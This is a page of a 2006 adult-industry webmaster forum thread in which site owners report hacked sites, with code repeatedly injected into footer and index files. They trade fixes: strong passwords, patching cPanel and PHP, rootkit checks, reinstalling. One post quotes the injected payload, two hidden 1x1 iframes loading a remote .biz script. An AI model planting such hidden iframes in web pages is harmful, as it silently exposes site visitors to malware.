HACKED! by megacount.net - Page 2 - GoFuckYourself.com

JOHNNY_BUTTHOLES · 10-05-2006, 02:48 AM

Quote:

Originally Posted by emthree

Yes, it was inserted into both of my footer files.
bottom1.html and bottom2.html

is it gone or is it still showing up?

emthree · 10-05-2006, 02:48 AM

Quote:

Originally Posted by RevSand

This does not seem to be a webair OR wordpress issue since I also have been hit and do not use either...

The plot thickens.

I bet the guy behind it all, is reading this and laughing at us.

emthree · 10-05-2006, 02:49 AM

Quote:

Originally Posted by JOHNNY_BUTTHOLES

is it gone or is it still showing up?

Since I removed it, I have not seen it back... yet.
How about you? What happened when you removed it?

chaze · 10-05-2006, 02:50 AM

Have you host run a rootcheck kit on your account, there may be backdoors still. Also have them to a search for that name in all your files from the command line.

JOHNNY_BUTTHOLES · 10-05-2006, 02:51 AM

Quote:

Originally Posted by emthree

Since I removed it, I have not seen it back... yet.
How about you? What happened when you removed it?

as i said i went through all my files (php, html) on all my sites. i found it on non-wordpress sites attached to regular php footers. i deleted it and changed the permissions to read only. it hasn't shown back up... yet.

i'm not on webair either.

bigalownz · 10-05-2006, 02:02 PM

Quote:

Originally Posted by emthree

Did/do you have wordpress installed on that site?

no

nothing at all no scipts etc just plan text

i deleted the page and put a new one up and a few days later it was back

i notice it only went on to index.html

emthree · 10-05-2006, 03:49 PM

McCord · 10-08-2006, 09:58 AM

Quote:

Originally Posted by Superterrorizer

You are going to switch hosts because you didn't keep your scripts up to date and your out dated insecure scripts are being exploited? Unless that service is part of your contract or SLA it's YOUR responsibility to keep your scripts up to date, not your hosts.

While many potential security threats both known and unknown can be blocked, many cannot. If your server gets hacked via an exploit in the OS or an application (apache, php, mysql, etc) then it's your hosts fault (Unless you are unmanaged/colo). If one of your sites gets hacked/defaced due to you not keeping your scripts up to date, it's your fault.

Switching hosts isn't going to magically update all your scripts and fix your security problems.

This guy/gal has it just about right. I work for a hosting provider and I've had to deal with this the past few days. Anyhow - here is a TIP:

STRONG PASSWORDS

it looks like your "hacker" is harvesting passwords (most likely insecure and very weak ones at that) and so far - the offending IP appears as (i've seen the same IP on 2 servers so far):

12.219.246.180

Ask your hosting provider (if you don't know how) to block all access from that IP and change ALL passwords on your system.

bigalownz · 10-08-2006, 04:58 PM

looks like Naughty america has had the problem too

there my friends hot mom members area has it too now

looks like its a big problem for all

Machete_ · 10-08-2006, 05:01 PM

Some say its a hole in PhP itself, other say its in cpanel. in any case its = root access

Gillespie · 10-08-2006, 05:03 PM

I have like a 25 char pass for my root account. All letter, numbers and punctuation marks, mixed caps, etc...

I hope I'm safe. :P

Machete_ · 10-08-2006, 05:12 PM

Quote:

Originally Posted by Gillespie

I have like a 25 char pass for my root account. All letter, numbers and punctuation marks, mixed caps, etc...

I hope I'm safe. :P

If they use a exploit in Cpanel or PhP as mentioned, they dont need your account.

Gillespie · 10-08-2006, 05:18 PM

Yeah, I know. I just updated everything as soon as I started seeing these threads in other boards a week and a half ago, so I hope I'm clear.

facialfreak · 10-08-2006, 07:00 PM

http://www.securityfocus.com/bid/14088/solution

http://www.securityfocus.com/bid/14088/solution

http://www.securityfocus.com/bid/14088/solution

http://www.securityfocus.com/bid/14088/solution

http://www.securityfocus.com/bid/14088/solution

http://www.securityfocus.com/bid/14088/solution

Gillespie · 10-08-2006, 07:12 PM

Woot! I was clear anyway =)

boneprone · 10-09-2006, 03:18 PM

Seems I got hacked today..

Would like if someone could shed some light on this on how they got in..

icq 66883099

Machete_ · 10-09-2006, 03:28 PM

Quote:

Originally Posted by boneprone

Seems I got hacked today..

Would like if someone could shed some light on this on how they got in..

icq 66883099

dissipate posted these two pretty usefull links
http://www.securiteam.com/unixfocus/6R0030UH5W.html
http://www.securiteam.com/unixfocus/6M00315H5S.html

Im my case (webair hosted) it was through cpanel

boneprone · 10-09-2006, 03:42 PM

Jupiter is looking into it now.

Not sure how he got in..

Looks like he just walked right in by logging in with a password.

Sosa · 10-09-2006, 03:48 PM

I noticed this on one of the sites I had a hardlink trade with this morning. Bad news.

Machete_ · 10-09-2006, 03:49 PM

Quote:

Originally Posted by boneprone

Jupiter is looking into it now.

Not sure how he got in..

Looks like he just walked right in by logging in with a password.

that is what happends when your password is:
From The Nectar Of The Bone Flows All That Clicks

CaptainHowdy · 10-09-2006, 03:49 PM

Quote:

Originally Posted by dissipate

Most adult servers lack even basic security measures. It's like shooting fish in a barrel.

!!

emthree · 10-09-2006, 03:50 PM

Quote:

Originally Posted by boneprone

Jupiter is looking into it now.

Not sure how he got in..

Looks like he just walked right in by logging in with a password.

I dont think that's the case. I had webair look at my logs, and they said they did not see anything funny.
Let us know what Jupiter says though.

bigalownz · 10-12-2006, 08:52 PM

just a qestion

do you use awstats ???

JD · 11-13-2006, 09:55 PM

bump for a fucking solution. got hit again just now

Kimo · 11-13-2006, 10:09 PM

theyve been hitting everyone lately

RyanL · 11-14-2006, 09:19 AM

ne1? ne1?

ladida · 11-14-2006, 09:55 AM

Most of you probably didn't even clean your sites so they don't even need another access.

Verbal · 11-14-2006, 10:31 AM

erased the virus and changed my password ... haven't had a problem since

Ace_luffy · 11-14-2006, 10:41 AM

any proofs

JD · 11-14-2006, 11:00 AM

Quote:

Originally Posted by Verbal

erased the virus and changed my password ... haven't had a problem since

i've done that about 10 times and it keeps happening

HEAT · 11-14-2006, 11:03 AM

still under hitting.

drjones · 11-14-2006, 11:47 AM

Quote:

Originally Posted by SPeRMiNaToR

i've done that about 10 times and it keeps happening

It really sucks.. but if your servers been compromised the only 100% solution is to wipe it an reinstall from scratch. If theyve had root access to your machine, they can do ANYTHING.

pornpf69 · 11-14-2006, 11:54 AM

JD · 11-14-2006, 11:58 AM

Quote:

Originally Posted by pornpf69

yep that's it. there's a new random char .net domain in the mix as well now

pornpf69 · 11-14-2006, 12:06 PM

Quote:

Originally Posted by SPeRMiNaToR

yep that's it. there's a new random char .net domain in the mix as well now

I had the same isue on my server....I kept that just for the records....heheeh they only infect some of the files....at random....

JD · 11-20-2006, 10:31 AM

buuuuump just got hit AGAIN today

10-05-2006, 03:49 PM	#57
emthree Dialer Kingpin Join Date: Jun 2003 Location: New York Posts: 10,816	__________________ • Sell Patches & Pills •

10-08-2006, 04:58 PM	#59
bigalownz Confirmed User Industry Role: Join Date: Aug 2005 Location: NEW ZEALAND Posts: 1,654	looks like Naughty america has had the problem too there my friends hot mom members area has it too now looks like its a big problem for all __________________ $100 free credit for all hosting needs

10-08-2006, 05:03 PM	#61
Gillespie Confirmed User Join Date: Aug 2006 Location: Montevideo Posts: 1,391	I have like a 25 char pass for my root account. All letter, numbers and punctuation marks, mixed caps, etc... I hope I'm safe. :P __________________ Blue Design Studios My choice for web design. Click this to see why. Get a REAL host. Try JaguarPC. 294-659-259

10-08-2006, 05:18 PM	#63
Gillespie Confirmed User Join Date: Aug 2006 Location: Montevideo Posts: 1,391	Yeah, I know. I just updated everything as soon as I started seeing these threads in other boards a week and a half ago, so I hope I'm clear. __________________ Blue Design Studios My choice for web design. Click this to see why. Get a REAL host. Try JaguarPC. 294-659-259

10-08-2006, 07:00 PM	#64
facialfreak Confirmed User Join Date: Feb 2005 Location: Montreal Posts: 3,018	http://www.securityfocus.com/bid/14088/solution http://www.securityfocus.com/bid/14088/solution http://www.securityfocus.com/bid/14088/solution http://www.securityfocus.com/bid/14088/solution http://www.securityfocus.com/bid/14088/solution http://www.securityfocus.com/bid/14088/solution __________________ Managed Shared Hosting starting at $4.99/mo Managed VPS starting at $29.99/mo

10-05-2006, 02:50 AM	#54
chaze Confirmed User Industry Role: Join Date: Aug 2002 Posts: 9,752	Have you host run a rootcheck kit on your account, there may be backdoors still. Also have them to a search for that name in all your files from the command line.

10-08-2006, 05:01 PM	#60
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	Some say its a hole in PhP itself, other say its in cpanel. in any case its = root access

10-08-2006, 07:12 PM	#65
Gillespie Confirmed User Join Date: Aug 2006 Location: Montevideo Posts: 1,391	Woot! I was clear anyway =) __________________ Blue Design Studios My choice for web design. Click this to see why. Get a REAL host. Try JaguarPC. 294-659-259

10-09-2006, 03:18 PM	#66
boneprone Hall Of Fame Industry Role: Join Date: Jan 2001 Location: Portland Oregon USA Posts: 34,415	Seems I got hacked today.. Would like if someone could shed some light on this on how they got in.. icq 66883099 __________________ Industry Hall Of Fame Legend Mike Jones Bow to the Power - Still BP4L http://gfyawards.com/hall-of-fame Learn about it kids.

10-09-2006, 03:42 PM	#68
boneprone Hall Of Fame Industry Role: Join Date: Jan 2001 Location: Portland Oregon USA Posts: 34,415	Jupiter is looking into it now. Not sure how he got in.. Looks like he just walked right in by logging in with a password. __________________ Industry Hall Of Fame Legend Mike Jones Bow to the Power - Still BP4L http://gfyawards.com/hall-of-fame Learn about it kids.

10-09-2006, 03:48 PM	#69
Sosa In Tushy Land Join Date: Oct 2002 Location: Nebraska Posts: 40,149	I noticed this on one of the sites I had a hardlink trade with this morning. Bad news.

10-12-2006, 08:52 PM	#73
bigalownz Confirmed User Industry Role: Join Date: Aug 2005 Location: NEW ZEALAND Posts: 1,654	just a qestion do you use awstats ??? __________________ $100 free credit for all hosting needs

11-13-2006, 09:55 PM	#74
JD Too lazy to set a custom title Industry Role: Join Date: Sep 2003 Posts: 22,651	bump for a fucking solution. got hit again just now

11-13-2006, 10:09 PM	#75
Kimo ... Join Date: Jan 2006 Location: Maryland ICQ:87038677 Posts: 11,542	theyve been hitting everyone lately __________________ ...

11-14-2006, 09:19 AM	#76
RyanL Confirmed User Join Date: Feb 2003 Location: Tampa, FL Posts: 1,145	ne1? ne1? __________________ ICQ: #126013016 :: Amateur Index

11-14-2006, 09:55 AM	#77
ladida Confirmed User Join Date: Nov 2005 Posts: 2,167	Most of you probably didn't even clean your sites so they don't even need another access. __________________ agentGFY at gmail.com

11-14-2006, 10:31 AM	#78
Verbal Confirmed User Join Date: Dec 2001 Location: Tampa, FL Posts: 3,420	erased the virus and changed my password ... haven't had a problem since

11-14-2006, 10:41 AM	#79
Ace_luffy www.creationcrew.com Industry Role: Join Date: Feb 2005 Location: CREATIONCREW.COM CREATIONCREW.COM CREATIONCREW.COM CREATIONCREW.COM CREATIONCREW.COM CREATIONCREW.COM Posts: 12,180	any proofs __________________ ++ Adult and Mainstream Websites Designs \| 10 banners for only $50 \| html5 Banners ++ email : [email protected] Telegram : https://t.me/creationcrew \| HTML5/Responsive Site - Div/CSS - ElevatedX - NATs - Wordpress

11-14-2006, 11:03 AM	#81
HEAT Confirmed User Join Date: Sep 2003 Posts: 2,255	still under hitting.

11-14-2006, 11:54 AM	#83
pornpf69 Too lazy to set a custom title Join Date: Jun 2004 Location: Brasil Posts: 15,778	<iframe src='http://fdghewrtewrtyrew.biz/adv/168/new.php' width=1 height=1></iframe> <iframe src='http://fdghewrtewrtyrew.biz/adv/new.php?adv=168' width=1 height=1></iframe> __________________ Do you need cheap, fast and reliable porn website hosting? Host Head is the way to go!! Asian Gay Special \| Live on MSN - Live Webcam Chat \| Live Adult Webcam Performances \| MY SWEET BLACKS LIVE ON CAM Cash X \| OK Pay \| Pukka Ropes \| Pukka Fetish \| STRAPED BLOG \| Male Bound and Fucked Pukka Tranny \| Tattooed Shemales \| She's A He \| Menu Porno \| Porn Performances \| All Chubby MY ICQ# 169833797

11-20-2006, 10:31 AM	#86
JD Too lazy to set a custom title Industry Role: Join Date: Sep 2003 Posts: 22,651	buuuuump just got hit AGAIN today